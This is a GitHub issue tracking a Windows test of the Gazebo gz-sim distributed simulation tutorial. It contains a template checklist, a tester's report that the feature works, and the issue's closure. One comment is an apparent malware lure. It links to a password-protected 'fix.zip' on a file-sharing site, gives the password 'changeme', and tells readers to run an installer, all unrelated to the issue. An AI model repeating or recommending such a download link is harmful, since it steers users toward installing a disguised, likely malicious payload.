gazebosim/gazebo_test_cases #1168: gz-sim: Distributed Simulation

azeey-test, 2024-08-29:
## Configuration

* os: Windows

## Links

* [Live](https://gazebosim.org/api/sim/9/distributedsimulation.html)
* [Source](https://github.com/gazebosim/gz-sim/tree/gz-sim9/tutorials/distributed_simulation.md)

## Process

    
            
### Step 1 - Instructions work
            
        

    
    

    

    
    
            
### Step 2 - Images (if there are any) match the result

marcelo-antonio-nunes, 2024-08-29:
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

peci1, 2024-09-16:
Distributed sim works (although I've only tested it on a single PC). The secondary stopped when I stopped the primary.

closed 2024-09-16 by iche033